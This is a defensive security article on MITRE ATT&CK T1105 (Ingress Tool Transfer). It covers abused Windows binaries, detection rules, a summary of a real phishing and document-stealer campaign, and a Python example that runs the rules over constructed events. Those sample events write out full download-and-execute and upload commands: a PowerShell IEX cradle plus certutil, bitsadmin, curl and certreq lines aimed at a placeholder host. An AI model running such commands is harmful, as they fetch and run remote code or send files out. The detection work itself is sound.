T1105-Ingress Tool Transfer
MITRE ATT&CK Technique: T1105 Ingress Tool Transfer. Detections, visibility, use cases and real world attack insights.
Adversaries often download additional tools to carry out various actions on compromised hosts. These may include tools for scanning the network to facilitate lateral movement or for establishing persistent access. Whatever a specific tool's purpose, bringing such tooling into a compromised environment is now a routine step in an intrusion.
Malicious Objectives for Ingress Tool Transfer
Administrative tooling and other native operating system binaries offer adversaries a variety of functionalities that are ripe for abuse. While an adversary can accomplish many of their objectives by living off the land, they often require non-native tooling to perform post-exploitation activity and accomplish their goals.
In real life, "living off the land" means surviving using only the natural resources around you. People do this for various reasons. Maybe they want to disconnect from society ("off the grid"), or perhaps they're avoiding someone or something. Some people simply enjoy the challenge of being self-sufficient.
In the technology world, “living off the land” (LotL) refers to attacker behavior that uses tools or features that already exist in the target environment. In this article, we’ll explore why intruders use LotL, review a selection of the tools and features they use, and discuss examples of actual LotL attacks. We’ll also provide some guidance for detecting and preventing some of the commonly used approaches.
How Adversaries Introduce Tools into a Compromised Environment
Adversaries carry out Ingress Tool Transfer through two primary methods:
Transfer via native Windows binaries: Native system binaries give adversaries the ability to establish external network connections and download files of various types, including executables, scripts, and other binaries. This method is by far the most prevalent, and its frequent use is a major reason Ingress Tool Transfer is so often observed alongside other ATT&CK techniques.
Transfer via third-party tooling: Adversaries also employ third-party tools for Ingress Tool Transfer. Although native system binaries are used more commonly, adversaries may opt for third-party tools in certain scenarios. The abuse of legitimate executables nonetheless remains the primary concern because of how widespread it is and how much impact it has on intrusions.
Let's take a closer look at the non-native software that adversaries employ for transferring tools, which also explains why they so often favor native tooling. Despite the file upload and download capabilities offered by most command-and-control (C2) frameworks, adversaries frequently opt for native binaries to acquire additional tools and payloads. This choice stems primarily from their desire to blend in and avoid suspicion. For example, if a process connected to a C2 server is observed downloading a file from an external network, it is likely to raise suspicion; if the same action is performed by a legitimate system process, it looks normal.
In addition to C2 tools, adversaries also turn to remote monitoring and management (RMM) software for ingress tool transfer. However, RMM tools present challenges for adversaries, as defenders can easily block unauthorized tools, prompting adversaries to resort to renaming them to evade detection.
PowerShell (T1059.001) stands out as the most commonly abused system binary for ingress tool transfer by adversaries. Adversaries also often abuse certutil, a command-line utility that is used to display certification authority (CA) configuration information, configure Certificate Services, and back up and restore CA components. Adversaries most often use it to download additional payloads. It can also be leveraged to decode/encode data as well as interact with alternate data streams (ADS). Similarly, adversaries leverage certreq, another built-in Windows binary, to manage certificates and facilitate file transfers. Additionally, adversaries commonly misuse BITSAdmin, a utility primarily used for managing BITS jobs for downloading Windows Updates, to download arbitrary files for their malicious activities.
Other binaries commonly abused for this purpose in recent attacks include:
rundll32
regsvr32
msbuild
msiexec
mshta
Actions That Need to be Taken
Addressing ingress tool transfer presents challenges due to the multitude of legitimate reasons for transferring tools between machines within an environment. Offering blanket advice is difficult. However, implementing application control policies to restrict the usage of tools commonly exploited for ingress tool transfer, such as remote management tools, can be beneficial. Given the frequent co-occurrence of Ingress Tool Transfer with PowerShell, it's advisable to review and implement the mitigation strategies outlined in the PowerShell section of this report. Additionally, leveraging the Windows host firewall to block outbound network connections for commonly abused LOLbins is another effective measure to consider.
Visibility
Detecting ingress tool transfer is crucial, as it plays a role in nearly every attack. Therefore, having the necessary telemetry to observe and detect it is essential. Fortunately, numerous data sources provide visibility into this technique, with many of them accessible through EDR and other widely available security tools.
Process Monitoring:
Because ingress tool transfer often involves system processes, monitoring those processes is important for detection. Effective detection, however, requires more than identifying known malicious processes. Detection analytics should cover not only process names but also command-line arguments, file modifications, DLL module loads, and network connections associated with those processes.
Command Monitoring:
Command-line arguments are an important aspect to monitor when detecting adversaries loading malicious tools into your environment. Beyond detection, command lines can also serve as a pivot point for investigation, especially where a PowerShell or cURL command line includes the URL used to host remote content for download and execution.
Network Connections:
Network connection data provides valuable insight for detecting ingress tool transfer. While network connection data alone is often incomplete, combined with process and command-line monitoring it becomes highly effective. If an adversary is performing ingress tool transfer, external network connections are likely to occur, making network telemetry a foremost component of effective detection.
Detection Technology
Windows Security Event ID 4688: Process Creation
Enabling command-line argument logging for Windows Security Event ID 4688 turns it into a useful native telemetry source for detecting ingress tool transfer. This event captures crucial information about process creation, providing insight into potentially malicious activity. Developing a thorough understanding of baseline process relationships within your environment is essential for discriminating genuine threats from false positives.
Endpoint Detection and Response (EDR) Tools
EDR tools serve as a powerful resource for identifying Ingress Tool Transfer. They offer extensive visibility into endpoint activity, including process starts, command lines, and network connections. These capabilities give organizations the monitoring needed to detect and respond to malicious activity effectively.
Possible Use Cases
Identifying Suspicious PowerShell Commands
Adversaries depend heavily on PowerShell for ingress tool transfer. Monitoring PowerShell process execution and analyzing command lines for suspicious PowerShell commands is therefore effective in detecting malicious ingress tool transfers.
process == powershell.exe && command_includes ('downloadstring' || 'downloaddata' || 'downloadfile' || 'iex' || '.invoke' || 'invoke-expression')
event_id == 4688 && parent_process == powershell.exe && command_includes ('WebClient' || 'bitsadmin' || 'finger' || 'curl')
CertUtil Downloading Malicious Binaries
Adversaries frequently evade security controls by abusing the Windows Certificate Utility (certutil.exe) to bring a malicious payload into the environment, typically invoking certutil.exe with the "-urlcache" and "-split" command-line options.
process == certutil.exe && command_includes ('urlcache' && 'split')
BITSAdmin Downloading Malicious Binaries
Adversaries, including those involved in ransomware attacks, often use BITSAdmin to download malicious files from the internet as a way to bypass application blocklisting. This utility allows them to download arbitrary files while evading detection. The following detection approach focuses on the execution of bitsadmin.exe with command options that suggest a file is being downloaded:
process == bitsadmin.exe && command_includes ('download' || 'transfer')
Certreq Downloading Malicious Binaries
Similar to certutil, adversaries can abuse certreq to download and upload data. This utility is another way for adversaries to carry out their malicious activities. The following detection method focuses on identifying instances of certreq.exe execution with command options that indicate file downloads.
process == certreq.exe && command_includes ('-post' || '-config' || 'http' || 'get')
Real-life Example
The campaign involves a two-step attack. During the first phase, an email without a malicious payload containing content copied from a legitimate Pakistani newspaper’s article is sent to the target. The sender address, which is spoofed, impersonates the PR wing of the Pakistani Armed Forces (info@ispr.gov.pk).
Two days later, a second email — purportedly a warning from the Pakistani military about the Pegasus spyware — containing a cutt.ly link to a malicious encrypted Word document and the password for decryption is sent to the target. The sender address impersonates a service similar to the one used in the first email (alert@ispr.gov.pk).

If the target clicks on either the link or on the “unsubscribe” link, it will download a Word document from the domain parinari[.]xyz.
The emails are sent either from an ExpressVPN exit node in Pakistan, or from a mail server under the attacker’s control.
Examining The Encrypted Document Containing Macros
After entering the password mentioned in the message, a document containing macros is displayed on screen.

If the victim enables macros, the malicious code will be loaded. If the victim enters any phone number and clicks “SUBMIT,” the text field will be replaced by the message “Phone Number Not Found.”
Behind the scenes, a .NET DLL file named skfk.txt, whose content is taken from the "Comments" property of the document, is created in the temporary directory. The file is then loaded into memory via PowerShell. From there, the malicious code proceeds in four stages:
Stage 1: A simple download-and-execute program. It downloads an ASCII file from the same domain, converts it into binary, loads it into memory, and jumps to a dynamic function.
Stage 2: A .NET DLL that downloads a third file from parinari[.]xyz, converts it from ASCII to binary, and creates a scheduled task to load it.
Stage 3: Similar to Stage 1, the only change being the URL used to retrieve the next stage.
Stage 4: The final payload (analyzed in the next section). It is never written to disk in clear text.

The final payload is a .NET DLL designed to steal documents and images. It targets files with extensions commonly associated with text documents, presentations, spreadsheets, and images: TXT, PDF, PNG, JPG, DOC, XLS, XLM, ODP, ODS, ODT, RTF, PPT, XLSX, XLSM, DOCX, PPTX, and JPEG. Covering this many formats lets the payload extract sensitive information from a wide range of document and image files, posing a significant threat to the confidentiality of personal and organizational data.
The "Documents," "Downloads," "Desktop," and "Pictures" folders of every user are checked. The DLL also examines drives other than C:.

When a file matching one of the listed extensions is found, its MD5 hash is calculated and compared to an exclusion list retrieved from the command-and-control (C&C) server pirnaram[.]xyz.
If the hash is not listed, the file is sent via the C&C to a directory named after the concatenation of the machine name and the username. The exclusion list is different for every machine name-username string.
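The detection rules from the Possible Use Cases section, evaluated over constructed Windows Security 4688 process-creation records. This is an added example and not code from the original article; the event tuples, the example.invalid host, and the file names are constructed for illustration.

```python
# Added example, not from the original article: the use-case rules above
# evaluated over constructed Windows Security 4688 (process creation) records.
# Constructed sample events (event_id, parent, process, cmdline); hosts use example.invalid.
SAMPLE_EVENTS = [
    (4688, "explorer.exe", "powershell.exe",
     "powershell -nop -w hidden -c IEX (New-Object Net.WebClient)"
     ".DownloadString('http://example.invalid/a.ps1')"),
    (4688, "powershell.exe", "curl.exe",
     "curl.exe -o C:\\Users\\Public\\x.exe http://example.invalid/x.exe"),
    (4688, "cmd.exe", "certutil.exe",
     "certutil.exe -urlcache -split -f http://example.invalid/p.exe p.exe"),
    (4688, "cmd.exe", "bitsadmin.exe",
     "bitsadmin /transfer job /download /priority high http://example.invalid/t.dll t.dll"),
    (4688, "cmd.exe", "certreq.exe",
     "certreq -Post -config http://example.invalid/up C:\\Users\\Public\\d.txt"),
    (4688, "services.exe", "svchost.exe", "svchost.exe -k netsvcs"),           # benign
    (4688, "explorer.exe", "powershell.exe", "powershell Get-ChildItem C:\\"),  # benign
]

def includes(cmd, *terms):
    """command_includes(a || b ...): any term appears, case-insensitively."""
    low = cmd.lower()
    return any(t in low for t in terms)

def includes_all(cmd, *terms):
    """command_includes(a && b ...): every term appears, case-insensitively."""
    low = cmd.lower()
    return all(t in low for t in terms)

# Each rule takes (parent_process, process, command_line); evaluate() lower-cases the names.
RULES = {
    "powershell_download_cradle": lambda par, proc, cmd: proc == "powershell.exe"
        and includes(cmd, "downloadstring", "downloaddata", "downloadfile",
                     "iex", ".invoke", "invoke-expression"),
    "powershell_spawns_transfer_tool": lambda par, proc, cmd: par == "powershell.exe"
        and includes(cmd, "webclient", "bitsadmin", "finger", "curl"),
    "certutil_urlcache_split": lambda par, proc, cmd: proc == "certutil.exe"
        and includes_all(cmd, "urlcache", "split"),
    "bitsadmin_download": lambda par, proc, cmd: proc == "bitsadmin.exe"
        and includes(cmd, "download", "transfer"),
    "certreq_transfer": lambda par, proc, cmd: proc == "certreq.exe"
        and includes(cmd, "-post", "-config", "http", "get"),
}

def evaluate(events):
    """Return (rule_name, process, command_line) for each rule that fires on a 4688 event."""
    return [(name, proc, cmd)
            for event_id, parent, proc, cmd in events if event_id == 4688
            for name, rule in RULES.items() if rule(parent.lower(), proc.lower(), cmd)]
```

As written on the page, substrings such as 'iex' and 'get' also match unrelated command lines, so baseline these rules against normal process activity in your environment before alerting on them.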